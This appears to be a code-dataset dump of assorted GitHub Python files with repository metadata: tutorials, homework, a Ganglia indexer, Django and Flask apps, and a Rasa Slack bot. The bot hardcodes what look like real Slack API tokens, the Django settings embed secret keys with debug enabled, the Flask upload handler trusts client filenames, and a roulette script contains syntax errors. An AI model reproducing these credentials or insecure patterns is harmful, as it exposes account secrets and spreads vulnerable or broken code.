blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eb4e53e7a11f537c011897a2c011394c6a7ed9ad
|
402732eab2f29019ea7de7c0832474fe0564ed06
|
/com/fk/python/python_io.py
|
5982d518426954f5bdf91d21e946bf2debcf2939
|
[] |
no_license
|
abugcreater/pythondemo
|
e5236d0847fed2c8e26a40e166f16e4a26e7e459
|
0ae14a8d8203d00fcfbd97584213f07da5fb51a3
|
refs/heads/master
| 2020-06-21T02:54:36.930599
| 2019-10-22T13:06:51
| 2019-10-22T13:06:51
| 197,327,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,782
|
py
|
import os
# str = int(input("请输入一个数字"),10)
# print("您输入的数字大于10: %s" %(str > 10))
# open 函数
# 你必须先用Python内置的open()函数打开一个文件,创建一个file对象,相关的方法才可以调用它进行读写。
# 语法:
#
# file object = open(file_name [, access_mode][, buffering])
# 各个参数的细节如下:
#
# file_name:file_name变量是一个包含了你要访问的文件名称的字符串值。
# access_mode:access_mode决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。
# buffering:如果buffering的值被设为0,就不会有寄存。如果buffering的值取1,访问文件时会寄存行。如果将buffering的值设为大于1的整数,表明了这就是的寄存区的缓冲大小。如果取负值,寄存区的缓冲大小则为系统默认。
file = open("/Users/fengkai/Desktop/rawdata", "r+")
print("文件名称:", file)
# file.write("this is my house")
# 读取文件按字节
print(file.readline(10000))
print("当前位置", file.tell())
print("继续读取", file.readline(100))
print("指针回到头部", file.seek(0, 0))
print("从头读取", file.readline(100))
# 关闭打开的文件
file.close()
print("文件名称:", file.mode)
# try catch语句
# try也可以嵌套执行
try:
fh = open("testfile", "w")
fh.write("这是一个测试文件,用于测试异常!!")
except IOError:
print("Error: 没有找到文件或读取文件失败", fh)
else:
print("内容写入文件成功")
finally:
fh.close()
print("finally执行成功")
def _raise_():
if 0 < 1:
raise Exception("try exception")
_raise_()
|
[
"kai.feng@qianli-inc.com"
] |
kai.feng@qianli-inc.com
|
43e6132a9bf1c0faddbb743d336f1b61965a2a6f
|
b0982b1a44e1b1043d538c33fb524cfaaf4a1bc6
|
/venc/bin/easy_install-2.7
|
e81a14a2546f1ded36da65474fdaa1e9713ccefc
|
[] |
no_license
|
vaivas/mps_database
|
f6083affe50de7a08a5167d903ae25226e6a7396
|
34aa2a64b8f9b60bd8981e17095ac2fb88ac3286
|
refs/heads/master
| 2020-06-24T11:06:58.317326
| 2017-07-28T23:19:04
| 2017-07-28T23:19:04
| 96,933,113
| 0
| 0
| null | 2017-07-11T20:11:12
| 2017-07-11T20:11:12
| null |
UTF-8
|
Python
| false
| false
| 308
|
7
|
#!/afs/slac.stanford.edu/g/lcls/vol8/epics/iocTop/users/lpiccoli/mps_database/venc/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"lpiccoli@slac.stanford.edu"
] |
lpiccoli@slac.stanford.edu
|
ba6157a78e52d5c6410effd2ef08ae4ad0d97694
|
0ecbc8d76b9b3e4046588ae410e2594de8053a3b
|
/3lesson_5quest.py
|
595bd84b346957bc0e4ccf7416d61c90ee6783fe
|
[] |
no_license
|
EsterMiracle/Homeworks
|
5990657694b503ff1972132ef172591c369644d6
|
0f94f70067777926e7c03a6b13543fc129b419e9
|
refs/heads/main
| 2023-01-04T20:23:56.420842
| 2020-11-03T18:48:08
| 2020-11-03T18:48:08
| 303,142,460
| 0
| 0
| null | 2020-11-03T18:50:45
| 2020-10-11T14:44:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
'''5. Программа запрашивает у пользователя строку чисел, разделенных пробелом.
При нажатии Enter должна выводиться сумма чисел.
Пользователь может продолжить ввод чисел, разделенных пробелом и снова нажать Enter.
Сумма вновь введенных чисел будет добавляться к уже подсчитанной сумме.
Но если вместо числа вводится специальный символ, выполнение программы завершается.
Если специальный символ введен после нескольких чисел, то вначале нужно добавить сумму этих чисел
к полученной ранее сумме и после этого завершить программу.'''
import sys
overall_result = 0
while True:
ur_numbs = input("Введите цифры через пробел, или q для выхода: ")
tokens = ur_numbs.split(" ")
for token in tokens:
try:
number = float(token)
overall_result += number
print(overall_result)
except:
if token == 'q':
print(f"Ваш результат: {overall_result}. Программа завершена.")
exit(0)
else:
print(f"Ваш результат: {overall_result}. Вы ввели неверное значение", file=sys.stderr)
exit(1)
|
[
"greedolife@yandex.ru"
] |
greedolife@yandex.ru
|
4c35eac75cc3aba4fadac2f1d673229090abada3
|
000ee368e4f225fe21504997b5118b599eb3c3af
|
/GangliaRest/gangliarest/build/lib/gangliarest/indexer.py
|
ed172f1660737276d65aa73e9f4fe01fa4bdd402
|
[
"MIT"
] |
permissive
|
dcarrollno/Ganglia-Modules
|
d39435d7f8cda949b0d73e1e63961ef0df0f1fb9
|
5e11313bbd3dfbdeebe79525a30e39dd8be3dd45
|
refs/heads/master
| 2020-04-12T02:26:30.543109
| 2019-03-20T14:07:51
| 2019-03-20T14:07:51
| 23,261,828
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,709
|
py
|
########################################
#
# This file part of the gangliarest package
#
# https://pypi.python.org/pypi/gangliarest
#
# https://github.com/dcarrollno/Ganglia-Modules/wiki/GangliaRest-API:-Part-I
#
# Dave Carroll - davecarrollno@gmail.com
#
########################################
import os
import sys
import time
import redis
import read_config as cfg
from loglib import loglib
cfg.readConfig()
rootDir = cfg.rrdDir
class GangliaIndexer(object):
''' Indexer class. This class contains two methods
which are responsible for indexing operations. Indexing
the locations of Ganglia node directories into Redis speeds
up access and response time for API clients requesting metric
info. '''
# Set in /etc/GangliaRest.cfg and defines how often we index
indexer_frequency = cfg.indexFreq
index_adds = 0
def __init__(self):
''' Constructor '''
def indexer(self):
''' The indexer method is responsible for establishing
a connection to the local Redis DB, walking the Ganglia
RRD tree and indexing directory locations into Redis. We
do this so we do not need to walk the entire filesystem
looking for metric locations. '''
r = redis.Redis(
host = cfg.redisHost,
port = cfg.redisPort,
db = cfg.redisDb,
password = cfg.redisAuth)
try:
for dirName, subdirList, fileList in os.walk(rootDir):
for host in subdirList:
location = os.path.abspath(dirName+'/'+host)
if host.startswith('__SummaryInfo__'):
continue
else:
try:
#print("Adding host %s to Redis" % host)
r.setex(host,location,cfg.redisTtl)
self.index_adds +=1
stat = True
except:
print("ERROR: Error inserting host into Redis")
loglib(cfg.logfile,"ERROR: Indexer failed to index host %s" % host)
stat = False
except Exception as e:
#print("Failed to scan filesystem")
loglib(cfg.logfile,"ERROR: INDEXER failed. Error reported was %s" % e)
stat = False
return(stat) # in case we want a return status
def indexTimer(self):
''' The indexTimer method historically was responsible for managing
timed runs - whether to run an indexing or not but has been
depreciated and now just acts as a calling method. This was when
this particular class used multithreading but no longer does. '''
try:
#print("Running indexer on schedule")
loglib(cfg.logfile,"INFO: INDEXER starting scheduled operations...")
runner = self.indexer()
if runner:
#print("Completed indexing")
loglib(cfg.logfile,"INFO: INDEXER completed run...Added %s entries to Redis" % self.index_adds)
return()
else:
print("Indexing failed receiving a False from the indexer method.")
return()
except Exception as e:
#print("Indexing failed. Exception thrown was %s" % e)
loglib(cfg.logfile,"ERROR: INDEXER threw an error of %s" % e)
return()
if __name__ == "__main__":
cfg.readConfig()
# Debugging
#myHandle = GangliaIndexer()
#while True:
# last_run = myHandle.indexTimer()
# time.sleep(15)
|
[
"dcarroll@nanigans.com"
] |
dcarroll@nanigans.com
|
1143293eb2e633c2902266c7b3d62838e52184aa
|
4a824ea7086be98d9212a5f07ffb3d052311eed0
|
/rasa_submission_final/Rasa_basic_folder/run_app.py
|
76d31f062053973fc7c7aeffd318e1c8c23b5ab9
|
[] |
no_license
|
PriyaPathak/RASA_Chatbot
|
41b159185fd6819b237fa285eb2cbcf427cc61c5
|
16ac5b40d67f05a432c5863eb9c307f48f01b5fc
|
refs/heads/master
| 2021-03-15T08:13:31.956104
| 2020-03-12T13:06:13
| 2020-03-12T13:06:13
| 246,836,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
from rasa_core.channels import HttpInputChannel
from rasa_core.agent import Agent
from rasa_core.interpreter import RasaNLUInterpreter
from rasa_slack_connector import SlackInput
nlu_interpreter = RasaNLUInterpreter('./models/nlu/default/restaurantnlu')
agent = Agent.load('./models/dialogue', interpreter = nlu_interpreter)
input_channel = SlackInput('xoxp-519263176963-520205334277-522261234227-265904113cbd9bbf3e1c315e575bc00e', #app verification token
'xoxb-519263176963-522365583506-IRKqnJLjNf0xl5rhB2PVO4Kx', # bot verification token
'wHbev3FDPeZzCOfy3o8zo7Ew', # slack verification token
True)
agent.handle_channel(HttpInputChannel(5004, '/', input_channel))
|
[
"pathakpriya456@gmail.com"
] |
pathakpriya456@gmail.com
|
ca1f7b8c2b5b319566ec717d2634a96b51a56411
|
6186c88f612ccf36addde0ca52c3bbea2e9f306a
|
/rest_framework_features/test.py
|
9678c6f08ac6715cf3ec7f34da30539a043d3fea
|
[
"ISC"
] |
permissive
|
cloudcode-hungary/django-rest-framework-features
|
7d43448850c3b48dc468f023f5b6121d6c7774d4
|
9ea16ccd93ce9b5d4b4fdd92dd9ca9537ab13e80
|
refs/heads/master
| 2023-01-08T09:32:45.809633
| 2020-02-14T00:02:56
| 2020-02-14T00:02:56
| 216,915,439
| 8
| 0
|
ISC
| 2022-12-26T20:16:29
| 2019-10-22T21:46:00
|
Python
|
UTF-8
|
Python
| false
| false
| 683
|
py
|
from django.urls import NoReverseMatch
from rest_framework.test import APIClient
from . import schema, urls
class FeatureAPIClient(APIClient):
def __call__(self, feature_name, kwargs=None, **extra):
feature_schema = schema.get_schema()
try:
feature_def = feature_schema[feature_name]
except KeyError:
raise NoReverseMatch(feature_name)
else:
path = urls.substitute(feature_def['coerced_url'], kwargs or {})
method = feature_def['http_method_name']
return getattr(self, method)(
path=path,
**extra,
)
__all__ = (
'FeatureAPIClient',
)
|
[
"balinabbb@gmail.com"
] |
balinabbb@gmail.com
|
477b71305f3c90033ce1f9b35f57918e94f508d5
|
e5bcfa69bafd993d29560dadc68ca0ec0ee903bd
|
/app/main/users/views.py
|
7899b3615f2c3381f09025669dc42dbf6a5e54e7
|
[] |
no_license
|
shaunstanislauslau/CuteOne
|
cc0a46fdf8614a314af8383c1a34885c88787e4f
|
77c4686a4883eae2e5f48df62936daf68558a966
|
refs/heads/master
| 2023-08-16T12:42:11.144866
| 2019-04-06T13:34:03
| 2019-04-06T13:34:03
| 179,913,149
| 0
| 0
| null | 2023-07-25T16:31:10
| 2019-04-07T03:21:07
|
CSS
|
UTF-8
|
Python
| false
| false
| 5,414
|
py
|
# -*- coding:utf-8 -*-
import time, json, random, os, hashlib
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from flask_login import login_user, logout_user
from app.admin.users import models as usersModels
from app.admin.author import models as authorModels
from app import MysqlDB
from app.main import index
from ..users import logic
from app import common
import config
THEMES = 'themes/'+ config.THEMES +'/'
@index.route('/users/login', methods=['GET', 'POST']) # Login
def login():
if request.method == 'GET':
return render_template(THEMES + 'users/login.html')
else:
username = request.form['username']
password = request.form['password']
password = common.hashPwd(password)
res = usersModels.users.checkpassword(username, password, request.remote_addr)
if res["code"]:
model = usersModels.users() # 实例化一个对象,将查询结果逐一添加给对象的属性
model.id = res["msg"].id
model.username = res["msg"].username
model.avatar = res["msg"].avatar
model.nickname = res["msg"].nickname
model.score = res["msg"].score
if res["msg"].group:
model.group = authorModels.authGroup.find_by_id(res["msg"].group).title
else:
model.group = "普通会员"
login_user(model)
return json.dumps({"code": 0, "msg": "登陆成功!"})
else:
return json.dumps({"code": 1, "msg": res["msg"]})
@index.route('/users/register', methods=['GET', 'POST']) # Register
def register():
username = request.form['username']
password = request.form['password']
nickname = request.form['nickname']
if len(password) < 6:
return json.dumps({"code": 1, "msg": "密码格式错误"})
password = common.hashPwd(password)
res = usersModels.users.check_username(username)
if res:
return json.dumps({"code": 1, "msg": "用户名已存在"})
else:
# 初始化role 并插入数据库
role = usersModels.users(
username = username,
password = password,
nickname = nickname,
email = '',
description = '',
avatar = "/static/uploads/avatar/{}.png".format(random.randint(1, 10)),
sex = 3,
login_num = 0,
score = 0,
group = 0,
status = 1,
register_ip = request.remote_addr,
birthday = '0001-01-01 00:00:00',
reg_time = time.strftime('%Y-%m-%d %H:%M:%S'),
update_time = time.strftime('%Y-%m-%d %H:%M:%S')
)
MysqlDB.session.add(role)
MysqlDB.session.flush()
MysqlDB.session.commit()
return json.dumps({"code": 0, "msg": "注册成功!"})
@index.route("/users/logout")
def logout():
logout_user()
return redirect(url_for('/._index'))
@index.route('/users/users_list', methods=['GET', 'POST'])
@index.route('/users/users_list/', methods=['GET', 'POST'])
def users_list():
page_number = '1' if request.args.get('page') is None else request.args.get('page')
result = logic.get_users_list(page_number, 12)
return render_template(THEMES+'users/users_list.html', data=result)
@index.route('/users/personal/<int:id>', methods=['GET', 'POST'])
def personal(id):
result = usersModels.users.find_by_id(id)
if result.group == 0:
result.group = "普通会员"
else:
result.group = authorModels.authGroup.find_by_id(result.group).title
return render_template(THEMES+'users/personal.html', data=result)
@index.route('/users/setting', methods=['GET', 'POST'])
def setting():
if request.method == 'GET':
if current_user.get_id() is not None:
result = usersModels.users.find_by_id(current_user.id)
return render_template(THEMES + 'users/setting.html', data=result)
else:
return redirect(url_for('/._index'))
else:
if current_user.get_id() is not None:
from_data = request.form
from_data = from_data.to_dict()
from_data['id'] = current_user.id
if int(from_data['formtype']) == 1:
from_data.pop('formtype')
# 是否修改密码
if from_data['password']:
from_data['password'] = common.hashPwd(from_data['password'])
else:
from_data.pop('password') # 不修改密码,删除键值
usersModels.users.update(from_data)
return json.dumps({"code": 0, "msg": "完成!"})
else:
return json.dumps({"code": 1, "msg": "未登陆!"})
@index.route('/users/upload', methods=['POST'])
def upload_avatar():
if current_user.get_id() is not None:
file = request.files.get('file')
fileName = hashlib.sha1(file.read()).hexdigest()
file.seek(0)
file_path = "/app/static/uploads/avatar/{}.{}".format(fileName, file.filename.rsplit('.',1)[1])
src_path = "/static/uploads/avatar/{}.{}".format(fileName, file.filename.rsplit('.',1)[1])
file.save(os.getcwd()+file_path)
return json.dumps({"code": 0, "msg": "", "data": {"src": src_path}})
else:
return json.dumps({"code": 1, "msg": "未登陆!"})
|
[
"hackxiaoya@gmail.com"
] |
hackxiaoya@gmail.com
|
c8f8760f1ade65ec08b7bc2ae56cab9437d0b580
|
0d7c04232f3adccf4cc9a78152b0489d54539d35
|
/monads/python/02_maybeInject.py
|
11b0ef1ab8caaed2084c535dd22cbef662295638
|
[] |
no_license
|
roschart/pruebas
|
30df0c35a4f4918f1b1cf3f91f0bb76e8939f42f
|
17f226c6bb9749d369fd90e549f797aeda632b2e
|
refs/heads/master
| 2022-09-24T13:04:38.438093
| 2022-09-14T07:17:55
| 2022-09-14T07:17:55
| 26,488,241
| 0
| 0
| null | null | null | null |
ISO-8859-13
|
Python
| false
| false
| 898
|
py
|
# -*- coding: latin-1 -*-
'''Esta parte serķan las librerias)'''
def sumar(self,x):
return self.valor+x
def dividir(self,x):
return self.valor/x
'''Esto es las tripas del sistema que solo se desarrollan una vez'''
class Contexto:
def __init__(self,valor):
self.valor=valor
def __str__(self):
if (self.valor):
return "Just(%s)" % self.valor.__str__()
return "Nadita"
def lifting(fun):
def inner (*v,**k):
self=v[0]
if self.valor==None:
return Contexto(None)
try:
return Contexto(fun(*v,**k))
except:
return Contexto(None)
return inner
def injectar (clase,funciones):
for f in funciones:
setattr(clase,f.__name__,lifting(f))
injectar(Contexto,[sumar,dividir])
'''Ejemplo de como usarlo'''
x=Contexto(10).sumar(2)
print (x)
x=Contexto(None).sumar(2)
print (x)
x=Contexto(10).sumar(2).dividir(3)
print (x)
x=Contexto(10).sumar(2).dividir(0)
print (x)
|
[
"joseluis.dominguez@DST-01-JLD.(none)"
] |
joseluis.dominguez@DST-01-JLD.(none)
|
d5bcab3105aafb36622225bb9a13f90e93a9205d
|
cfb8e3ab7fb8c6152dcff2be2fa2cdfae186d600
|
/LinkingLoader2021/LinkingLoader/objreader.py
|
0c1546db66ceb66c5fcdcb634ba19ab46d8e7010
|
[] |
no_license
|
Yellow-Shadow/SICXE
|
1f4ff07f3481073c180f41654f192c287aae2d09
|
8ab8579d6eb4199dd21dfca60ba6eb13fb3f2e5c
|
refs/heads/main
| 2023-08-21T23:25:56.252387
| 2021-10-10T18:57:00
| 2021-10-10T18:57:00
| 415,673,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
def readOBJFiles(sourceFile):
try:
with open(sourceFile, "r") as fp:
return fp.readlines();
except FileNotFoundError:
print("\nError:所指定要讀取的 OBJ File 並不存在!\n")
return None
def readRecordWithoutSpace(originalRecord):
return originalRecord.replace(" ", "")
|
[
"noreply@github.com"
] |
Yellow-Shadow.noreply@github.com
|
dbe11ebab6a4ea395a337d7c0b95989df91bc395
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_228/ch120_2020_03_25_20_40_19_161428.py
|
58f17c36bc3c0aa31df128cbf6cb82ff40598761
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
import random
d=100
while d>0:
r=random.randint(0,36)
print(f"Dinheiro disponível: {d}")
aposta=int(input("Quanto você deseja apostar? "))
if aposta==0:
break
elif aposta>d:
print("Você não tem dinheiro suficiente")
else:
Tipo=input("Qual o tipo de aposta? Número ou Paridade? ")
if Tipo="Número":
n=int(input("Escolha um número de 0 a 36: "))
if n==r:
d=d+aposta*35
else:
d=d-aposta
if Tipo="Paridade":
p=input("Par ou ímpar? ")
if r%2==0:
r="Par"
else:
r="Ímpar"
if r==p:
d=d+aposta
else:
d=d-aposta
|
[
"you@example.com"
] |
you@example.com
|
b4523882013a8e47a58bc3d651a935a84aa35df5
|
09fbaaa2ec2daa1eca9587e31e0e4e37ed0186a4
|
/LanwellManagementSystem/settings_production.py
|
77c94bedc4dbb3b1514aab8a4f8d097dd3633d5a
|
[] |
no_license
|
agriev/LanwellManagementSystem
|
aec4a39e4197f7bcb1fce4fdaee20faad6cb8269
|
1a6718915f82f4c765d69596f2b48fae2a922ffd
|
refs/heads/master
| 2016-09-06T14:43:07.993751
| 2014-11-17T18:42:57
| 2014-11-17T18:42:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,482
|
py
|
"""
Django settings for LanwellManagementSystem project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'uwik+1+fugk*eor@w@x(rh733eu!--5z8fcytp92)=(=**8x$b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'LDMSystemMain',
'django.contrib.webdesign',
'bootstrap3',
'simplejson',
'django_tables2',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'LanwellManagementSystem.urls'
WSGI_APPLICATION = 'LanwellManagementSystem.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
TEMPLATE_CONTEXT_PROCESSORS = ("django.core.context_processors.request",
"django.contrib.auth.context_processors.auth",)
|
[
"anton@griev.ru"
] |
anton@griev.ru
|
fb09c038b749af37dffc53735ea4b6ba7e470ac5
|
0191e79206a35d58ae65e6dc954f8f356ee50a34
|
/demosite/demosite/settings.py
|
525f5d176dd6be9dac09db0bd8e9c13875b71de0
|
[] |
no_license
|
slidemoon/gdemo
|
7b8f391e990f41b53da9ac1803059fc4b235681f
|
e434b6982b4d2601a97f631a379fd2324c37dd2b
|
refs/heads/master
| 2020-12-30T16:14:53.882070
| 2017-07-08T02:53:56
| 2017-07-08T02:53:56
| 90,966,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,205
|
py
|
"""
Django settings for demosite project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nuujy#xwanwmrs92myn24w8d)5uwu+6xsox371cbvhq!%b235@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gdemo.apps.GdemoConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'demosite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'demosite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
# Session Engine
SESSION_ENGINE = 'django.contrib.sessions.backends.file'
|
[
"yi.shen@arkdesign.cn"
] |
yi.shen@arkdesign.cn
|
064ba7c69bb9cf2e2a708ac3bc57ddd442273699
|
5cdf48eaa413b5211319a9bced6ede6f689b15ed
|
/10/RandomForest/11.SaveCorrectModel.py
|
831308bd778de01865bcf92a5b8abbbbd1add83b
|
[] |
no_license
|
akshitasawhney3008/MTech-thesis
|
518177b8bcb3112c9e1470af89df0250d00503dd
|
f9e9d3481b2fa5b3e8ac7a2d1e180656542e1156
|
refs/heads/master
| 2021-06-28T00:57:34.685127
| 2020-12-09T08:56:33
| 2020-12-09T08:56:33
| 189,271,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
import pickle
from sklearn.preprocessing import normalize
from sklearn.ensemble import RandomForestClassifier
import numpy as np
iter = 5
seed = 42
with open('ListOfBestParamsRS.pkl', 'rb') as f:
best_params = pickle.load(f)
path = "C://Users//Arushi//PycharmProjects//Final_Thesis_chap1//9//"
for i in range(iter):
X_train = np.load(path + 'transformed_train_data_' + str(i) + '.npy')
Y_train = np.load(path + 'transformed_train_labels_' + str(i) + '.npy')
X_train = X_train.astype('float')
X_train = normalize(X_train)
Y_train = Y_train.astype('float')
Y_train = Y_train.astype(int)
bp = best_params[i]
clf = RandomForestClassifier(n_estimators=bp['n_estimators'], bootstrap=bp['bootstrap'], max_depth=bp['max_depth'],
max_features=bp['max_features'], min_samples_leaf=bp['min_samples_leaf'],
min_samples_split=bp['min_samples_split']).fit(X_train, Y_train.ravel())
with open('Model_rf' + str(i) + '.pkl', 'wb') as f:
pickle.dump(clf, f)
|
[
"noreply@github.com"
] |
akshitasawhney3008.noreply@github.com
|
6b380419b28d072dd1c3ffd968329845932e9826
|
91efdcf621fbf8083c3a5ae9561e15e1c526979d
|
/doms/domsapp/urls.py
|
81ef9ce1342b45d297f7b6a2816b48d6467845a6
|
[] |
no_license
|
bigyanghimire/Namobuddha
|
60416f3a40b3cd97131c34be85a4354ca6a2edf8
|
43cd041e82816ea11ef57f8dcfabd91f1fabdc76
|
refs/heads/master
| 2022-12-03T16:39:44.667578
| 2018-07-22T16:31:38
| 2018-07-22T16:31:38
| 139,167,575
| 0
| 1
| null | 2022-11-28T07:28:27
| 2018-06-29T15:40:45
|
Python
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
from django.conf.urls import url,include
from . import views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns=[
url(r'^$',views.index,name="index"),
url(r'^search/$',views.search,name="search"),
url(r'^searchdate/$',views.searchdate,name="searchdate"),
url(r'^addfile/$',views.addfile,name="addfile"),
url(r'^delete-entry/(?P<pk>\d+)$', views.DeleteView, name='delete_view'),
#url(r'^add/$',views.add,name="add"),
]
|
[
"ghimire.vigyan@gmail.com"
] |
ghimire.vigyan@gmail.com
|
a0d82258e312cec6ebff69f1080a1a3014c5bd2f
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/htpi99zeTsvjWNujz_11.py
|
88cd0efdbf7dde7dc57026649130a9c332e23c91
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
"""
Given two integers `a` and `b`, return how many times `a` can be halved while
still being greater than `b`.
### Examples
halve_count(4666, 544) ➞ 3
# (4666 -> 2333 -> 1166.5 -> 583.25)
halve_count(624, 8) ➞ 6
# (624 -> 312 -> 156 -> 78 -> 39 -> 19.5 -> 9.75)
halve_count(1000, 3) ➞ 8
# (1000 -> 500 -> 250 -> 125 -> 62.5 -> 31.25 -> 15.625 -> 7.8125 -> 3.90625)
### Notes
* Integer `a` will always be (at least) greater than the _twice_ of `b`.
* You are expected to solve this challenge via a **recursive** approach.
"""
def halve_count(a, b):
if a <= b:
return -1
return 1 + halve_count(a/2,b)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
50257f98a45f5ab5ab95435e92d5da92c0a4a5b6
|
